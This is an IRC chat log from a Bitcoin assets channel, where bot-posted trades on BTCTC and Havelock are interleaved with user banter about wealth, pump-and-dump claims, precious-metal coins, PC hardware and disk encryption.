22 17:16:00 [BTCTC] [AMC-PT] 200 @ 0.00358 = 0.716 BTC [-] Jul 22 17:16:02 [BTCTC] [AMC-PT] 100 @ 0.003578 = 0.3578 BTC [-] Jul 22 17:18:26 [BTCTC] [ASICMINER-PT] 1 @ 4.70011 BTC [-] Jul 22 17:25:35 [BTCTC] [COGNITIVE] 1 @ 0.790001 BTC [+] Jul 22 17:25:37 [BTCTC] [COGNITIVE] 5 @ 0.79 = 3.95 BTC [-] Jul 22 17:26:26 [BTCTC] [COGNITIVE] 4 @ 0.79 = 3.16 BTC [-] Jul 22 17:28:15 wow cog is getting killed now Jul 22 17:28:47 [BTCTC] [AMC-PT] 220 @ 0.003611 = 0.7944 BTC [+] Jul 22 17:29:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.04599 BTC [+] Jul 22 17:30:16 it was a pump Jul 22 17:30:23 yeah Jul 22 17:30:45 [BTCTC] [ASICMINER-PT] 1 @ 4.759999 BTC [+] Jul 22 17:31:36 [BTCTC] [BITVPS] 8 @ 0.002001 = 0.016 BTC [+] Jul 22 17:34:17 [BTCTC] [AMC-PT] 200 @ 0.00375 = 0.75 BTC [+] Jul 22 17:34:30 [BTCTC] [AMC-PT] 438 @ 0.003811 = 1.6692 BTC [+] Jul 22 17:35:05 [BTCTC] [AMC-PT] 220 @ 0.003955 = 0.8701 BTC [+] Jul 22 17:35:12 ok, guys, this is really weird Jul 22 17:35:21 i just found myself agreeing with max keiser Jul 22 17:35:26 Hello is this the channel where you talk about your bitcoin assets Jul 22 17:35:31 like, how many bitcoin you have? Jul 22 17:35:34 http://www.maxkeiser.com/2013/07/anonymous-analytics-goes-after-corrections-corp-of-america/ Jul 22 17:35:34 No Jul 22 17:35:44 bitcoin-assets refers to assets denominated in bitcoin Jul 22 17:36:04 So we talk about how many Bitcoins we have? Jul 22 17:36:08 like equities, derivatives, etc Jul 22 17:36:16 i have 22 million Jul 22 17:36:17 [BTCTC] [AMC-PT] 1000 @ 0.003956 = 3.956 BTC [+] Jul 22 17:36:18 mostly we do just compare how rich we are Jul 22 17:36:23 Yes exactly Jul 22 17:36:25 lol Jul 22 17:36:25 how smart we are Jul 22 17:36:30 I have a lot of Bitcoins Jul 22 17:36:32 and how big mircea's dick is Jul 22 17:36:33 [BTCTC] [AMC-PT] 146 @ 0.00398 = 0.5811 BTC [+] Jul 22 17:36:34 Do you have a lot of Bitcoins? Jul 22 17:36:37 but do you have 22 million? Jul 22 17:36:40 You should send them to me Jul 22 17:36:42 [BTCTC] [BASIC-MINING] 1 @ 0.620547 BTC [-] Jul 22 17:36:44 I will reinvest them Jul 22 17:36:49 Nobody has 22M btc Jul 22 17:36:52 that's not possible Jul 22 17:36:55 hahaha, i am joking Jul 22 17:36:56 i know Jul 22 17:37:06 That's like playing bs Jul 22 17:37:08 the card game Jul 22 17:37:13 and saying you have 5 Ace's Jul 22 17:37:18 yeah Jul 22 17:37:19 [BTCTC] [BASIC-MINING] 1 @ 0.610101 BTC [-] Jul 22 17:37:21 Actually Jul 22 17:37:21 [BTCTC] [BASIC-MINING] 1 @ 0.610101 BTC [-] Jul 22 17:37:26 You can have 4 aces and a Joker Jul 22 17:37:27 So Jul 22 17:37:30 What is this assbot and why is he spamming MY channel Jul 22 17:37:30 booya Jul 22 17:37:35 but in general measuring dick size in a financial sense with a bunch of assholes online is just as valuable Jul 22 17:37:52 But that's what this channel is for Jul 22 17:37:56 lol Jul 22 17:38:00 goat on the forums told me to visit this channel Jul 22 17:38:06 [BTCTC] [BASIC-MINING] 2 @ 0.6101 = 1.2202 BTC [-] Jul 22 17:38:24 ah, now it makes sense Jul 22 17:38:39 are you like a troll assassin? Jul 22 17:38:45 [BTCTC] [BASIC-MINING] 1 @ 0.61 BTC [-] Jul 22 17:38:57 ahhaha Jul 22 17:39:00 I still can't get over the 1MatthewNWrightisaScammer Jul 22 17:39:14 That address will be written in history Jul 22 17:39:14 nice Jul 22 17:39:27 Yes I am a troll assassin Jul 22 17:39:28 boo Jul 22 17:39:29 [BTCTC] [BASIC-MINING] 2 @ 0.606001 = 1.212 BTC [-] Jul 22 17:39:31 If you have a troll on your forums Jul 22 17:39:33 i am a troll assassin Jul 22 17:39:38 <---- Jul 22 17:39:46 I will be so boring he will leave Jul 22 17:39:51 hahha Jul 22 17:39:52 You know I am a mod on just-dice.com Jul 22 17:40:00 Because there was a spamming problem and I took care of it Jul 22 17:40:04 Through social engineering Jul 22 17:40:06 they have mods now? Jul 22 17:40:12 It's a secret Jul 22 17:40:19 is it? Jul 22 17:40:22 That was my plan Jul 22 17:40:29 [BTCTC] [BASIC-MINING] 5 @ 0.606 = 3.03 BTC [-] Jul 22 17:40:29 That the trolls don't know there are mods Jul 22 17:40:33 [BTCTC] [RSM] 1 @ 0.016889 BTC [-] Jul 22 17:40:38 but now we know Jul 22 17:40:47 Well now we don't have a spamming problem Jul 22 17:40:51 you showed us your 5th ace Jul 22 17:41:21 No that is not a good analagy Jul 22 17:41:30 maybe i'm trolling Jul 22 17:41:36 So I have this project where I believe that everyone on the forum is an idiot Jul 22 17:41:41 https://bitcointalk.org/index.php?topic=245568.0 Jul 22 17:41:42 [BTCTC] [AMC-PT] 1000 @ 0.00389 = 3.89 BTC [-] Jul 22 17:41:43 [BTCTC] [RSM] 2 @ 0.016889 = 0.0338 BTC [-] Jul 22 17:41:43 Proof Jul 22 17:41:46 makes sense so far... Jul 22 17:41:47 Best of #bitcoin IRC Jul 22 17:41:53 [BTCTC] [BASIC-MINING] 1 @ 0.6011 BTC [-] Jul 22 17:42:28 [BTCTC] [BASIC-MINING] 1 @ 0.6 BTC [-] Jul 22 17:42:48 [BTCTC] [AMC-PT] 500 @ 0.003988 = 1.994 BTC [+] Jul 22 17:42:54 meh Jul 22 17:43:02 seems like a chore to read that Jul 22 17:43:21 That thread is pure gold Jul 22 17:43:23 [BTCTC] [BASIC-MINING] 5 @ 0.599 = 2.995 BTC [-] Jul 22 17:43:24 or should I say Jul 22 17:43:24 Chaang-noi: then again #bitcoin-assets is the only serious bitcoin chan i know of other than -dev. Jul 22 17:43:26 Pure Bitcoin Jul 22 17:43:34 That's why I made that thread Jul 22 17:43:39 [HAVELOCK] [SDSTM] 2 @ 0.01099 = 0.022 BTC [-] Jul 22 17:43:42 [HAVELOCK] [SDSTM] 8 @ 0.01095 = 0.0876 BTC [-] Jul 22 17:43:51 '(In response to Zerocoin) - It's helpful because the name tells you how many BTC you should trust it with." Jul 22 17:44:04 "the only function this forum serves is to spread wrong information so someone can profit" Jul 22 17:44:04 chaang doesnt realize he's just polluting the chan Jul 22 17:44:13 sending people here from a thread like that Jul 22 17:44:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.04599 BTC [+] Jul 22 17:44:18 [BTCTC] [BASIC-MINING] 1 @ 0.560002 BTC [-] Jul 22 17:44:19 LOL Jul 22 17:44:40 He said that this is a channel where you talk about your wealth Jul 22 17:44:45 So now everyone will come here Jul 22 17:44:47 no, Jul 22 17:44:48 We need a new chan Jul 22 17:44:57 #bitcoin-rich Jul 22 17:44:59 invite-onlly Jul 22 17:45:00 it's a channel where Chaang-Noi talks about his wealth Jul 22 17:45:05 only people who invest big get in Jul 22 17:45:06 [BTCTC] [BASIC-MINING] 1 @ 0.57 BTC [+] Jul 22 17:45:08 [BTCTC] [BASIC-MINING] 1 @ 0.560002 BTC [-] Jul 22 17:45:19 ThickAsThieves: it's a channel where Chaang-Noi talks about his wealth Jul 22 17:45:23 hahaha Jul 22 17:45:24 How do you want to talk about your wealth, you don't even own a lambo! Jul 22 17:45:35 [BTCTC] [AMC-PT] 1 @ 0.004 BTC [+] Jul 22 17:45:35 troll_assassin, add that line to the thread Jul 22 17:45:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.04599 = 0.4599 BTC [+] Jul 22 17:45:43 YES Jul 22 17:45:50 lol Jul 22 17:45:54 however you are measuring today I guess Jul 22 17:45:54 So what exactly did Chaang do? Jul 22 17:45:57 [BTCTC] [BASIC-MINING] 1 @ 0.560002 BTC [-] Jul 22 17:46:03 Was he just an early investor Jul 22 17:46:06 usually you measure it in rice rockets and lambos Jul 22 17:46:07 early adopter Jul 22 17:46:10 and did some buisiness Jul 22 17:46:25 srsly, the forums are where good convos go to die Jul 22 17:46:32 [BTCTC] [BASIC-MINING] 2 @ 0.55 = 1.1 BTC [-] Jul 22 17:46:50 In the German translation of "Turn My Swag On": he says "Du fahrst VM, ich kauf nen BMW, penner" Jul 22 17:46:51 it's hard for me Jul 22 17:46:57 "You drive VM, I'll buy a BMW, hobo" Jul 22 17:47:01 i iz srs bznz Jul 22 17:47:25 Geramny version of turn my swag on: http://www.youtube.com/watch?v=zCfm-vWuQRk Jul 22 17:47:36 [BTCTC] [BASIC-MINING] 1 @ 0.544001 BTC [-] Jul 22 17:47:40 [BTCTC] [TAT.ASICMINER] 7 @ 0.04599 = 0.3219 BTC [+] Jul 22 17:47:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.04599 = 0.4599 BTC [+] Jul 22 17:47:59 this channel: assbot assbot assbot Jul 22 17:48:02 So much ass Jul 22 17:48:06 asshat Jul 22 17:48:17 So just-dice was down and doog is gone Jul 22 17:48:19 missing Jul 22 17:48:36 offline on forums/irc/gtalk Jul 22 17:48:42 Yes it's just kind of funny Jul 22 17:48:49 Because everyone is spreading FUD Jul 22 17:48:49 [BTCTC] [BASIC-MINING] 2 @ 0.544 = 1.088 BTC [-] Jul 22 17:49:08 Maybe Dooglus will run Jul 22 17:49:12 would be pretty funny Jul 22 17:49:31 [BTCTC] [BASIC-MINING] 1 @ 0.53 BTC [-] Jul 22 17:49:33 Hey let's trust some stat guy with 25000btc in 2 weeks! Jul 22 17:49:37 [HAVELOCK] [SDSTM] 1 @ 0.011 BTC [+] Jul 22 17:49:47 *35k at some point afaik Jul 22 17:49:50 How can I make money on this site? Jul 22 17:49:50 nice Jul 22 17:50:04 you actually can male money here Jul 22 17:50:08 make Jul 22 17:50:14 ok Jul 22 17:50:25 [BTCTC] [BASIC-MINING] 1 @ 0.5222 BTC [-] Jul 22 17:50:31 just be around for when people discuss good knowledge Jul 22 17:50:54 I have more knowledge than them Jul 22 17:51:06 I predicted bitcoin price 2 times 1 year ahead Jul 22 17:51:09 since 2011 Jul 22 17:51:23 and I predicted AsicMiner stock price when it went from 1 to 2 Jul 22 17:52:19 [BTCTC] [BASIC-MINING] 4 @ 0.52101 = 2.084 BTC [-] Jul 22 17:52:25 here it is Jul 22 17:52:26 Jun 28 14:40:26 can i make bitcoin off this site? Jul 22 17:52:58 So when do you think it will hit 500usd Jul 22 17:53:04 [BTCTC] [BASIC-MINING] 6 @ 0.521 = 3.126 BTC [-] Jul 22 17:53:18 Rulother what do you think I'm some sort of oracle? Jul 22 17:53:23 yes Jul 22 17:53:34 I can make an informed decision Jul 22 17:53:48 You said you predicted the price 2 times, 1 year ahead. Jul 22 17:53:59 Do you know what caused the price to go from $10 to $100? Jul 22 17:54:05 [BTCTC] [AMC-PT] 10 @ 0.003939 = 0.0394 BTC [-] Jul 22 17:54:20 Because I know exactly what happened Jul 22 17:54:20 A large pizza + a liter of coke Jul 22 17:54:34 [BTCTC] [AMC-PT] 815 @ 0.003939 = 3.2103 BTC [-] Jul 22 17:54:43 Are you familiar with the Kim Dotcom pump-and-dump from the 90s? Jul 22 17:54:52 He basically can never go back to Germany again Jul 22 17:55:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.045995 = 0.23 BTC [+] Jul 22 17:55:16 Have you ever considered smoking pot? Jul 22 17:55:19 no Jul 22 17:55:23 [BTCTC] [LTC-ATF.B2] 35 @ 0.010291 = 0.3602 BTC [+] Jul 22 17:55:48 It looks like Rulother does not know about Kim Dotcom Jul 22 17:55:51 do you guys think the spike in gold will have an effect in bitcoin? Jul 22 17:56:05 How am I supposed to teach him price fixing is he doesn't even know these famous figures in the market? Jul 22 17:56:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.045997 = 0.46 BTC [+] Jul 22 17:56:25 Chaang-Noi i hopo you dont end up usagi Jul 22 17:56:41 dammit gold spiked? I've been putting off buying some... Jul 22 17:56:44 kakobreklaa: whats new! Jul 22 17:56:53 its above 1300 Jul 22 17:57:06 up 3% since the open Jul 22 17:57:17 [BTCTC] [LTC-ATF.B2] 42 @ 0.010292 = 0.4323 BTC [+] Jul 22 17:57:23 but started going up over the weekend Jul 22 17:57:32 [HAVELOCK] [AM100] 2 @ 0.044 = 0.088 BTC [-] Jul 22 17:57:34 ugh, nvm, this nick is cool, but i'd rather be me Jul 22 17:57:41 I will say this once. Kim Dotcom in 2001 investing all-in into letsbuyit.com and said he will invest 50M Euro to the public (obviously a lie and everyone knew it). Jul 22 17:57:45 This was a pump-and-dump Jul 22 17:57:58 He turned his 375K Euro into 1.5M Euro Jul 22 17:58:02 i dont think we care Jul 22 17:58:07 [HAVELOCK] [AM100] 2 @ 0.044 = 0.088 BTC [-] Jul 22 17:58:14 heya mjr_, ah not much, everything is fucked as it was, you? Jul 22 17:58:24 [BTCTC] [AMC-PT] 9 @ 0.003825 = 0.0344 BTC [-] Jul 22 17:58:25 eh, its ok Jul 22 17:58:27 Sorry had a work call t here, but I did know of it. Jul 22 17:58:42 did you guys see those guys who found 36 million in silver? Jul 22 17:58:46 ThickAsThieves, "just be around for when people discuss good knowledge' Jul 22 17:58:52 sea eploration company Jul 22 17:59:00 DeCiB3l: what do you think the bottom is Jul 22 17:59:06 ;;ticker Jul 22 17:59:07 MtGox BTCUSD ticker | Best bid: 90.20034, Best ask: 90.86498, Bid-ask spread: 0.66464, Last trade: 90.84000, 24 hour volume: 9046.81233898, 24 hour low: 88.00000, 24 hour high: 92.00000, 24 hour vwap: 90.33840 Jul 22 17:59:16 In early 2013 Kim Dotcom annouced on his Tiwtter that he will "Create a Bitcoin credit-card". Just saying that one line and nothing else Jul 22 17:59:21 is = will be Jul 22 17:59:24 the price went from $10 to $100 Jul 22 17:59:25 we already hit the bottom Jul 22 17:59:30 silver is abundant i hear Jul 22 17:59:34 well yeah Jul 22 17:59:48 I suspect he did not cash out yet because all of his accounts are frozen Jul 22 17:59:49 i also heard that they have found out where the universes gold comes from Jul 22 18:00:02 the collisions of dead stars Jul 22 18:00:09 from the golden gods? Jul 22 18:00:11 But that was the easiest pump-and-dump he has ever done, and these Bitcoin investors are so dumb nobody even noticed Jul 22 18:00:13 and each one of those collisions produces more gold than 10 moons Jul 22 18:00:34 kakobreklaa: I need you to hire your somalian goons to do a piracy job Jul 22 18:00:35 Chaang-Noi, gold can't burn Jul 22 18:00:36 [BTCTC] [AMC-PT] 30 @ 0.003691 = 0.1107 BTC [-] Jul 22 18:00:36 ??? Jul 22 18:00:41 It was in the thread Jul 22 18:00:59 [HAVELOCK] [HIM] 5 @ 0.252 = 1.26 BTC [+] Jul 22 18:01:01 Silver is how I first got into investing Jul 22 18:01:06 you gonna rob colliding stars? Jul 22 18:01:15 i want to Jul 22 18:01:19 thestringpuller, if your into piracy The Pirate Bay is celebrating their 10 year aniversary on August 10 in Stockholm Jul 22 18:01:20 i could use ten moons worth of gold Jul 22 18:01:45 Fuck that, mine the moon. Jul 22 18:02:04 mhm Jul 22 18:02:06 Have you seen 2001? Jul 22 18:02:12 It's there man Jul 22 18:02:25 mjr_ you dont like helium? :) Jul 22 18:02:49 helium is actually expensive Jul 22 18:02:50 [HAVELOCK] [AM100] 2 @ 0.044 = 0.088 BTC [-] Jul 22 18:02:52 and getting more so Jul 22 18:03:02 yeah Jul 22 18:03:09 maybe its better than gold Jul 22 18:03:11 easier to ship Jul 22 18:03:15 ;;g helium Jul 22 18:03:15 Error: "g" is not a valid command. Jul 22 18:03:16 ;;g helium 3 Jul 22 18:03:16 Error: "g" is not a valid command. Jul 22 18:03:19 fu Jul 22 18:03:22 lol Jul 22 18:03:24 ;;google helium 3 Jul 22 18:03:24 Helium-3 - Wikipedia, the free encyclopedia: ; Mining Helium-3 On the Moon - YouTube: ; Could Helium-3 really solve Earth's energy problems? - Io9: Jul 22 18:03:40 In short yes it will out do gold Jul 22 18:03:48 inb4 SpaceX stock on bitfunder.com Jul 22 18:04:26 [BTCTC] [AMC-PT] 400 @ 0.003691 = 1.4764 BTC [-] Jul 22 18:04:31 oh that, yeah as soon as kelinworth finds a nugget Jul 22 18:04:35 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00339 BTC [-] Jul 22 18:05:08 this chat is dumb Jul 22 18:05:14 [HAVELOCK] [AM100] 1 @ 0.044 BTC [-] Jul 22 18:05:28 [BTCTC] [AMC-PT] 806 @ 0.00375 = 3.0225 BTC [+] Jul 22 18:05:32 [BTCTC] [AMC-PT] 3570 @ 0.003691 = 13.1769 BTC [-] Jul 22 18:05:33 [BTCTC] [AMC-PT] 117 @ 0.00365 = 0.4271 BTC [-] Jul 22 18:06:17 Yes Jul 22 18:06:18 just go with i7 Jul 22 18:06:20 No Jul 22 18:06:23 [BTCTC] [AMC-PT] 10 @ 0.003824 = 0.0382 BTC [+] Jul 22 18:06:26 AMD is better value for your money Jul 22 18:06:59 you are acting like money is problem Jul 22 18:07:08 [BTCTC] [AMC-PT] 2000 @ 0.003845 = 7.69 BTC [+] Jul 22 18:07:16 Chaang well if you're a rich motherfucker than get an i7 Jul 22 18:07:24 i7 black Jul 22 18:07:47 gaming or video-editing or rendering? Jul 22 18:07:53 Isn't the next generation supposedly coming out soon from both sides? I would say wait til Oct if you can Jul 22 18:07:54 or whatever workstation work you do Jul 22 18:07:59 [BTCTC] [AMC-PT] 100 @ 0.0039 = 0.39 BTC [+] Jul 22 18:08:08 Chaang-Noi, then you need a single core Jul 22 18:08:17 [i]need[/i] Jul 22 18:08:40 what? Jul 22 18:08:46 [BTCTC] [AMC-PT] 35 @ 0.003939 = 0.1379 BTC [+] Jul 22 18:08:50 Chaang get an SSD and the biggest monitor Jul 22 18:08:56 get a hybrid drive maybe Jul 22 18:08:57 If you have the money Jul 22 18:09:06 SSD are so cheap now Jul 22 18:09:11 Beyond HD Jul 22 18:09:24 goat do you have to overpay for everything because you don't buy it in the US? Jul 22 18:09:35 [BTCTC] [AMC-PT] 1642 @ 0.003949 = 6.4843 BTC [+] Jul 22 18:10:03 Makes sense Jul 22 18:10:12 Get a 2560x1600 monitor Jul 22 18:10:16 Doesn't matter which one Jul 22 18:10:30 You're crazy Jul 22 18:10:30 makes a lot of sense for linux Jul 22 18:10:33 where you can partition Jul 22 18:10:48 i personally like RAID-10's with 2 tb drives Jul 22 18:11:05 limited writes? Jul 22 18:11:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.045991 = 0.092 BTC [-] Jul 22 18:11:40 encryption is just fine Jul 22 18:11:47 can't see how it would make a difference Jul 22 18:11:50 and you wont use up your writes Jul 22 18:11:55 i mean, drive level encryption really barely helps you Jul 22 18:11:57 the problem is the controller Jul 22 18:12:01 did i just see a ban Jul 22 18:12:03 if that goes Jul 22 18:12:09 then you are fucked. Jul 22 18:12:11 TOTALLY ANARCHY Jul 22 18:12:18 [BTCTC] [AMC-PT] 200 @ 0.00395 = 0.79 BTC [+] Jul 22 18:12:20 [BTCTC] [AMC-PT] 522 @ 0.00395 = 2.0619 BTC [+] Jul 22 18:12:35 if i remember correctly, drive level will only help you in the event someone gains physical access to your machine Jul 22 18:12:40 [BTCTC] [ASICMINER-PT] 1 @ 4.71 BTC [-] Jul 22 18:12:49 which is by far the least of most people's worries Jul 22 18:12:53 [BTCTC] [BASIC-MINING] 1 @ 0.559999 BTC [+] Jul 22 18:12:55 really? Jul 22 18:13:04 i would say that out of most bitcoin hacks Jul 22 18:13:12 almost none were by someone stealing a hard drive Jul 22 18:13:25 almost all were by someone gaining access to a machine that was already on Jul 22 18:13:29 using a network Jul 22 18:13:38 mmm AMC :) Jul 22 18:13:39 well that is what i mean Jul 22 18:13:42 nice action today Jul 22 18:13:52 you can have disk level, but you would still encrypt the files that are important Jul 22 18:13:52 was all quiet over the weekend lol Jul 22 18:14:01 so they would be encrypted either way Jul 22 18:14:20 [BTCTC] [DMS.MINING] 2 @ 0.0149 = 0.0298 BTC [+] Jul 22 18:14:27 [BTCTC] [ASICMINER-PT] 1 @ 4.700101 BTC [-] Jul 22 18:14:41 yo dawg, i heard you like encryption... Jul 22 18:14:46 [BTCTC] [AMC-PT] 685 @ 0.003984 = 2.729 BTC [+] Jul 22 18:14:58 just delete those nudes Jul 22 18:14:58 [BTCTC] [ASICMINER-PT] 1 @ 4.7001 BTC [-] Jul 22 18:15:02 we have all seen em by now Jul 22 18:15:03 yes, i know, you would want to get disk level and then partition level and maybe even file level Jul 22 18:15:31 [BTCTC] [ASICMINER-PT] 1 @ 4.700101 BTC [+] Jul 22 18:15:38 you could read up on noiseless steganography Jul 22 18:15:45 my point was, if you have file level...the rest is mostly irrelevant, and that attack vector is IMO the smallest Jul 22 18:15:54 that's where its all heading next Jul 22 18:15:54 physical security is usually a lot easier to maintain Jul 22 18:16:21 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0034 = 0.0102 BTC [+] Jul 22 18:16:25 i mean disk level is usually not great....because like xkcd said about the $5 wrench Jul 22 18:16:46 and, the govt has been trying to get a legal equivalent to a $5 wrench Jul 22 18:17:05 they are trying to pressure people that are arrested to be forced to decrypt their drives Jul 22 18:17:14 with penalties for "forgetting" password Jul 22 18:17:31 so far, being key word Jul 22 18:17:44 whoever mentioned stego is right Jul 22 18:17:48 [BTCTC] [TAT.VIRTUALMINE] 24 @ 0.0034 = 0.0816 BTC [+] Jul 22 18:17:50 [BTCTC] [TAT.VIRTUALMINE] 101 @ 0.0034 = 0.3434 BTC [+] Jul 22 18:17:56 think mircea_popescu wrote about pictures with encoded btc info Jul 22 18:17:56 +1 Jul 22 18:17:59 [BTCTC] [BASIC-MINING] 3 @ 0.522003 = 1.566 BTC [-] Jul 22 18:18:01 [BTCTC] [BASIC-MINING] 1 @ 0.522002 BTC [-] Jul 22 18:18:03 [BTCTC] [BASIC-MINING] 10 @ 0.521002 = 5.21 BTC [-] Jul 22 18:18:04 [BTCTC] [BASIC-MINING] 4 @ 0.521 = 2.084 BTC [-] Jul 22 18:18:05 [BTCTC] [BASIC-MINING] 35 @ 0.52 = 18.2 BTC [-] Jul 22 18:18:17 [BTCTC] [S.BBET-PT] 1 @ 0.001996 BTC [-] Jul 22 18:18:34 http://www.amazon.com/Noiseless-Steganography-The-Covert-Communications/dp/1439846219 Jul 22 18:18:39 Noiseless Steganography: The Key to Covert Communications: Abdelrahman Desoky: 9781439846216: Amazon Jul 22 18:18:47 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00343 = 0.1715 BTC [+] Jul 22 18:19:29 sell some AMC-PT :p Jul 22 18:19:29 truecrypt has a feature like that Jul 22 18:19:39 encrypted drive, and secret encrypted drive Jul 22 18:19:50 with two separate passwords, one opens the one "oh, you got me" Jul 22 18:20:15 that's plausible deniability Jul 22 18:20:31 yeah Jul 22 18:20:43 [HAVELOCK] [AM100] 3 @ 0.044 = 0.132 BTC [-] Jul 22 18:20:54 but also stego, in that they don't know there is secret info, you are hiding the secret info in other public info Jul 22 18:20:55 I read an article recently about a hacker, where the police couldn't decode his computer and he didn't have to give up the password due to the 5th Amend, and got off clean as a result. Jul 22 18:21:11 well, i think they are only up to taking away the first 4 Jul 22 18:21:19 so still a little time while we get the 5th Jul 22 18:21:22 [BTCTC] [TAT.VIRTUALMINE] 590 @ 0.00352 = 2.0768 BTC [+] Jul 22 18:21:29 Yeah for now Jul 22 18:21:34 no joke, guy sued for 4th amendment violation Jul 22 18:21:55 Tell me about it Jul 22 18:22:54 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00355 = 0.355 BTC [+] Jul 22 18:23:31 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.00355 = 0.71 BTC [+] Jul 22 18:24:27 haha Jul 22 18:24:29 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00358 BTC [+] Jul 22 18:24:29 hahaha Jul 22 18:24:35 lol who? Jul 22 18:25:06 Ahhhh ok Jul 22 18:26:09 here is the third amendment case http://www.foxnews.com/politics/2013/07/08/family-booted-from-home-for-police-detail-suing-with-rare-use-third-amendment/ Jul 22 18:26:18 didnt you get banned for fraud goat? Jul 22 18:26:31 [HAVELOCK] [AM100] 15 @ 0.044 = 0.66 BTC [-] Jul 22 18:27:02 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003599 = 0.3599 BTC [+] Jul 22 18:27:06 no in IRC Jul 22 18:27:09 recently Jul 22 18:27:18 [BTCTC] [AMC-PT] 1 @ 0.00389 BTC [-] Jul 22 18:27:28 oh Jul 22 18:27:36 [BTCTC] [TAT.VIRTUALMINE] 401 @ 0.003599 = 1.4432 BTC [+] Jul 22 18:27:44 word Jul 22 18:29:12 [HAVELOCK] [VTX] 1 @ 0.5 BTC [+] Jul 22 18:29:22 [BTCTC] [TAT.VIRTUALMINE] 293 @ 0.0036 = 1.0548 BTC [+] Jul 22 18:29:23 [BTCTC] [TAT.VIRTUALMINE] 829 @ 0.0036 = 2.9844 BTC [+] Jul 22 18:29:24 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.0036 = 1.08 BTC [+] Jul 22 18:29:34 [BTCTC] [AMC-PT] 49 @ 0.00389 = 0.1906 BTC [-] Jul 22 18:29:58 [HAVELOCK] [HIM] 4 @ 0.25000001 = 1 BTC [-] Jul 22 18:31:07 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003403 = 0.034 BTC [-] Jul 22 18:31:09 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003402 = 0.3402 BTC [-] Jul 22 18:31:11 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0034 = 0.0068 BTC [-] Jul 22 18:31:15 [HAVELOCK] [SMG] 85 @ 0.000265 = 0.0225 BTC [-] Jul 22 18:31:21 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003653 = 0.0365 BTC [+] Jul 22 18:31:23 [BTCTC] [TAT.VIRTUALMINE] 408 @ 0.003654 = 1.4908 BTC [+] Jul 22 18:31:31 [HAVELOCK] [SMG] 300 @ 0.000261 = 0.0783 BTC [-] Jul 22 18:31:37 [BTCTC] [AMC-PT] 63 @ 0.0039 = 0.2457 BTC [+] Jul 22 18:31:39 do you guys think it is worth it to get gold that is minted? or is bullion better? Jul 22 18:31:44 [HAVELOCK] [SMG] 2253 @ 0.00026 = 0.5858 BTC [-] Jul 22 18:31:53 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003654 = 0.0365 BTC [+] Jul 22 18:31:54 definiately coins Jul 22 18:31:58 lol Jul 22 18:32:00 ok, why Jul 22 18:32:03 [HAVELOCK] [SMG] 2480 @ 0.000255 = 0.6324 BTC [-] Jul 22 18:32:04 lunar II for ex Jul 22 18:32:08 since i got opposite answers Jul 22 18:32:12 they are much more liquid Jul 22 18:32:25 and they might develop a premium over time Jul 22 18:32:48 [HAVELOCK] [SMG] 15 @ 0.000278 = 0.0042 BTC [+] Jul 22 18:33:01 i mean, and maybe this is silly, but how hard would it be to just mint your own coins? Jul 22 18:33:02 well if you trade in 400 Oz bars that's fine Jul 22 18:33:09 [HAVELOCK] [VTX] 2 @ 0.5 = 1 BTC [+] Jul 22 18:33:12 the reason i ask, is exactly you pay seignorage Jul 22 18:33:15 but if you have let's say a million bucks then still coins definiately Jul 22 18:33:30 and i see a lot of bullshit coins anyway Jul 22 18:33:35 john galt and ron paul, etc Jul 22 18:33:40 you just don't know the coins Jul 22 18:33:51 no that crap is not for you Jul 22 18:33:52 but point is, you can get more of the metal with bullion i would imagine Jul 22 18:33:57 lol, i know Jul 22 18:34:01 i would get double eagles or krug Jul 22 18:34:10 stick to perth mint lunars lunars Jul 22 18:34:20 just curious Jul 22 18:34:20 sure Jul 22 18:34:23 maybe both Jul 22 18:34:24 [BTCTC] [ASICMINER-PT] 1 @ 4.705 BTC [+] Jul 22 18:34:26 [BTCTC] [ASICMINER-PT] 1 @ 4.700101 BTC [-] Jul 22 18:34:28 and why perth mint lunars Jul 22 18:34:28 [BTCTC] [ASICMINER-PT] 2 @ 4.7001 = 9.4002 BTC [-] Jul 22 18:34:48 because they are extremely liquid, and seminumismatic Jul 22 18:35:05 you buy at bullion price and they develope a premium over the years Jul 22 18:35:12 also chinese panda's are a good bet Jul 22 18:35:27 [BTCTC] [TAT.ASICMINER] 7 @ 0.045991 = 0.3219 BTC [-] Jul 22 18:35:34 interesting guys, thanks Jul 22 18:35:36 [BTCTC] [COGNITIVE] 1 @ 0.780001 BTC [-] Jul 22 18:35:37 [BTCTC] [COGNITIVE] 1 @ 0.78 BTC [-] Jul 22 18:35:38 [BTCTC] [COGNITIVE] 1 @ 0.77 BTC [-] Jul 22 18:35:40 [BTCTC] [COGNITIVE] 3 @ 0.77 = 2.31 BTC [-] Jul 22 18:35:55 [BTCTC] [TAT.ASICMINER] 11 @ 0.045991 = 0.5059 BTC [-] Jul 22 18:36:00 pamp suisse? Jul 22 18:36:12 silver i would buy perth lunar's, koala's panda's etc Jul 22 18:36:17 not fucking bars Jul 22 18:36:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.045997 BTC [+] Jul 22 18:36:18 gold Jul 22 18:36:26 bars suck when u need to sell Jul 22 18:36:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.045991 = 0.092 BTC [-] Jul 22 18:36:37 [BTCTC] [TAT.ASICMINER] 3 @ 0.04599 = 0.138 BTC [-] Jul 22 18:36:39 bars can be filled with tungsten Jul 22 18:36:41 etc etc Jul 22 18:36:45 sure Jul 22 18:36:47 not 1oz though, right? Jul 22 18:36:50 [BTCTC] [AMC-PT] 60 @ 0.003691 = 0.2215 BTC [-] Jul 22 18:36:51 